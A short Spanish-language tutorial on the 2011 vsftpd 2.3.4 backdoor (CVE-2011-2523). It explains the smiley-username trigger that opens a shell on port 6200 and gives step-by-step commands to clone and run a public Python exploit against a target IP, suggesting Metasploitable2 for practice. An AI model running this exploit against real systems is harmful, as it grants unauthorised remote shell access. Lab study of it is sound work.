
Exploit en Python para vsftpd 2.3.4 - Ejecución de comandos por puerta trasera
vsftpd, que significa Very Secure FTP Daemon, es un servidor FTP para sistemas tipo Unix, incluyendo Linux. Está licenciado bajo la Licencia Pública General de GNU. Soporta IPv6 y SSL.
En julio de 2011, se descubrió que la versión 2.3.4 de vsftpd descargable desde el sitio principal había sido comprometida. Los usuarios que inician sesión en un servidor vsftpd-2.3.4 comprometido pueden ingresar :) (una carita sonriente) como nombre de usuario y obtener un shell de comandos en el puerto 6200. Esto no fue un problema de un agujero de seguridad en vsftpd, sino que alguien subió una versión diferente de vsftpd que contenía una puerta trasera. Desde entonces, el sitio se trasladó a Google App Engine.
sudo apt update
sudo apt install python3
sudo apt install python3-pip
pip install argparse
git clone https://github.com/padsalatushal/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py
python3 exploit.py -host IP_Objetivo
Ejemplo: python3 exploit.py -host 192.168.168.128

Puedes probar el exploit en Metasploitable2
https://www.computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson8/index.html https://subscription.packtpub.com/book/networking_and_servers/9781786463166/1/ch01lvl1sec18/vulnerability-analysis-of-vsftpd-2-3-4-backdoor